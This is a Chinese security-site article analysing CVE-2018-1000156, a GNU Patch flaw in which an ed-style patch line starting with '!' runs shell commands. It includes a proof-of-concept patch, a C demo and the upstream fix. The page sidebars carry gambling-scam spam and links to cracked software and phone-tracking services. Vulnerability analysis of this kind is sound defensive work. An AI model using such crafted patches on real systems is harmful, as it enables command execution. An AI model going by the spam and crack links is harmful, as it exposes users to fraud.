ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全文章 → CVE-2018-1000156:GNU Patch任意代码执行漏洞分析

CVE-2018-1000156:GNU Patch任意代码执行漏洞分析

时间:2018-05-16 07:00:00人气:作者:本站作者我要评论

漏洞背景

使用ed格式并用!开头的补丁,会导致代码执行

影响版本

GNU Patch 2.7.6及以下

(笔者下载了GNU Patch 2.7.1~6源码编译测试,都存在该问题)

GNU Patch 源码下载

漏洞分析(PoC)

  1. --- a   2018-13-37 13:37:37.000000000 +0100
  2. +++ b   2018-13-37 13:38:38.000000000 +0100
  3. 1337a
  4. 1,112d
  5. !echo "pwn successfully!"

调试过程

gdb 设置参数运行:

  1. set args test < ./poc.patch
  2. b do_ed_script

函数原型

  1. FILE *popen(const char *command, const char *type);

如果type是"w"则文件指针连接到command的标准输入,会将patch的内容传入/bin/ed/ - ./test.oUm4Sb5的输入中,test.oUm4Sb5是之前make_tempfile创建的临时文件。

popen()函数通过创建一个管道,调用fork()产生一个子进程,执行一个shell以运行命令来开启一个进程

启动的进程为/bin/ed,而!在ed编辑器中表示后面跟的是操作系统命令,从而导致代码执行。

CVE-2018-1000156:GNU Patch任意代码执行漏洞分析

Demo

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <fcntl.h>
  5. #include <sys/types.h>
  6. #include <sys/stat.h>
  7. int main()
  8. {
  9.         FILE *pipefp = 0;
  10.         char *buf[200];
  11.         static FILE *pfp;
  12.         sprintf(buf,"%s","/bin/ed - ./temp.txt");
  13.         fflush(stdout);
  14.         pipefp = popen(buf,"w");
  16.         sprintf(buf,"%s","1337a\n1,112d\n!echo 'pwn successfully'\n");
  17.         fwrite(buf,1,200,pipefp);
  18.         pclose(pipefp);
  19.         return 0;
  20. }

popen处fork了父进程和子进程,父进程通过fwrite将运行的命令传入管道,子进程此时打开了/bin/ed,接受了命令,并执行。

补丁分析

  1. diff --git a/src/pch.c b/src/pch.c
  2. index bc6278c..f97a4dc 100644
  3. --- a/src/pch.c
  4. +++ b/src/pch.c
  5. @@ -33,6 +33,7 @@
  6.  # include <io.h>
  7.  #endif
  8.  #include <safe.h>
  9. +#include <sys/wait.h>
  11.  #define INITHUNKMAX 125            /* initial dynamic allocation size */
  13.  @@ -2389,22 +2390,25 @@ do_ed_script (char const *inname, char const *outname,
  14.      static char const editor_program[] = EDITOR_PROGRAM;
  16.      file_offset beginning_of_this_line;
  17. -    FILE *pipefp = 0;
  18.      size_t chars_read;
  19. +    FILE *tmpfp = 0;
  20. +    char const *tmpname;
  21. +    int tmpfd, tmpfl;
  22. +    pid_t pid;
  23. +
  24. +    if (! dry_run && ! skip_rest_of_patch)
  25. +      {
  26. +    /* Write ed script to a temporary file: this causes ed to abort on
  27. +       invalid commands.  If we used a pipe instead, ed would continue
  28. +       after invalid commands.  */
  29. +    tmpfd = make_tempfile (&tmpname, 'e', NULL, O_RDWR | O_BINARY, 0);
  30. +    if (tmpfd == -1)
  31. +      pfatal ("Can't create temporary file %s", quotearg (tmpname));
  32. +    tmpfp = fdopen (tmpfd, "w+b");
  33. +    if (! tmpfp)
  34. +      pfatal ("Can't open stream for file %s", quotearg (tmpname));
  35. +      }
  37. -    if (! dry_run && ! skip_rest_of_patch) {
  38. -    int exclusive = *outname_needs_removal ? 0 : O_EXCL;
  39. -    assert (! inerrno);
  40. -    *outname_needs_removal = true;
  41. -    copy_file (inname, outname, 0, exclusive, instat.st_mode, true);
  42. -    sprintf (buf, "%s %s%s", editor_program,
  43. -         verbosity == VERBOSE ? "" : "- ",
  44. -         outname);
  45. -    fflush (stdout);
  46. -    pipefp = popen(buf, binary_transput ? "wb" : "w");
  47. -    if (!pipefp)
  48. -      pfatal ("Can't open pipe to %s", quotearg (buf));
  49. -    }
  50.      for (;;) {     char ed_command_letter;
  51.      beginning_of_this_line = file_tell (pfp);
  52. @@ -2415,14 +2419,14 @@ do_ed_script (char const *inname, char const *outname,     }
  53.      ed_command_letter = get_ed_command_letter (buf);     if (ed_command_letter) {-        if (pipefp)
  54. -        if (! fwrite (buf, sizeof *buf, chars_read, pipefp))
  55. +        if (tmpfp)
  56. +        if (! fwrite (buf, sizeof *buf, chars_read, tmpfp))             write_fatal ();         if (ed_command_letter != 'd' && ed_command_letter != 's') {
  57.              p_pass_comments_through = true;         while ((chars_read = get_line ()) != 0) {-            if (pipefp)
  58. -            if (! fwrite (buf, sizeof *buf, chars_read, pipefp))
  59. +        if (tmpfp)
  60. +            if (! fwrite (buf, sizeof *buf, chars_read, tmpfp))                 write_fatal ();             if (chars_read == 2  &&  strEQ (buf, ".\n"))             break;@@ -2435,13 +2439,50 @@ do_ed_script (char const *inname, char const *outname,         break;
  61.      }
  62.      }
  63. -    if (!pipefp)
  64. +    if (!tmpfp)
  65.      return;
  66. -    if (fwrite ("w\nq\n", sizeof (char), (size_t) 4, pipefp) == 0-    || fflush (pipefp) != 0)+    if (fwrite ("w\nq\n", sizeof (char), (size_t) 4, tmpfp) == 0+    || fflush (tmpfp) != 0)       write_fatal ();-    if (pclose (pipefp) != 0)
  67. -      fatal ("%s FAILED", editor_program);
  68. +
  69. +    if ((tmpfl = fcntl (tmpfd, F_GETFD)) == -1+        || fcntl (tmpfd, F_SETFD, tmpfl & ~FD_CLOEXEC) == -1)
  70. +      pfatal ("Can't clear close-on-exec flag of %s", quotearg (tmpname));
  71. +
  72. +    if (lseek (tmpfd, 0, SEEK_SET) == -1)
  73. +      pfatal ("Can't rewind to the beginning of file %s", quotearg (tmpname));
  74. +
  75. +    if (! dry_run && ! skip_rest_of_patch) {
  76. +       int exclusive = *outname_needs_removal ? 0 : O_EXCL;
  77. +       assert (! inerrno);
  78. +       *outname_needs_removal = true;
  79. +       copy_file (inname, outname, 0, exclusive, instat.st_mode, true);
  80. +       sprintf (buf, "%s %s%s", editor_program,
  81. +            verbosity == VERBOSE ? "" : "- ",
  82. +            outname);
  83. +       fflush (stdout);
  84. +
  85. +       pid = fork();
  86. +       if (pid == -1)
  87. +         pfatal ("Can't fork");
  88. +       else if (pid == 0)
  89. +         {
  90. +           dup2 (tmpfd, 0);
  91. +           execl ("/bin/sh""sh""-c", buf, (char *) 0);
  92. +           _exit (2);
  93. +         }
  94. +       else
  95. +         {
  96. +           int wstatus;
  97. +           if (waitpid (pid, &wstatus, 0) == -1+            || ! WIFEXITED (wstatus)
  98. +           || WEXITSTATUS (wstatus) != 0)
  99. +             fatal ("%s FAILED", editor_program);
  100. +         }
  101. +    }
  102. +
  103. +    fclose (tmpfp);
  104. +    safe_unlink (tmpname);
  105.      if (ofp)
  106.        {

补丁是创建了临时文件来代替pipe操作,使用文件的方式会使得ed因为无效的命令而退出,而之前的pipe操作遇到无效的命令后会继续执行。但popen的内部实现其实也是通过先fork,再dup2(fd,0),最后执行execl,补丁只是模拟了这一过程,并用文件的方式代替了管道操作。
其他缓解措施:以/bin/ed -r的形式启动,而-r参数的含义是:

  1. -r, –restricted           run in restricted mode

运行在严格的模式下,它禁止从当前目录编辑文件和执行shell命令。

相关文章

猜你喜欢

  • 深入解析浅谈《快3单双准确率方法》成功方案

    2022-09-28 /

  • 全网首发《快3单双大小必中方法技巧》思路汇总

    2022-09-28 /

  • 资深攻略《快3大小必中技巧》上岸方法

    2022-09-28 /

  • 【最准确的玩法】《回血上岸计划导师QQ》操作系列

    2022-09-28 /

  • 经验教程《导师一分快三计划》最新窍门

    2022-09-28 /

  • 高手教你《大小单双最安全的打法》三期必中

    2022-09-28 /

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

推荐文章

本类推荐

本类热门

热门软件

快手官方解封神器,一键快速解封快手账号安全文章 “黑客教父”郭盛华被警方抓捕 涉嫌非法利用信息网络罪被刑拘安全新闻 福昕pdf编辑器(附激活码)图像处理 最新电影电视可用m3u8直播源【2018-5-15更新m3u8直播源】破解资源 黑客定位技术-黑客定位手机号查询精准物理位置找人安全新闻 餐饮管家收银管理2.2.0下载其它行业 最新BarTender2020注册机下载扫描打印 谷歌访问助手chrome插件上网辅助 迅捷视频转换器免费(附注册码)格式转换

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网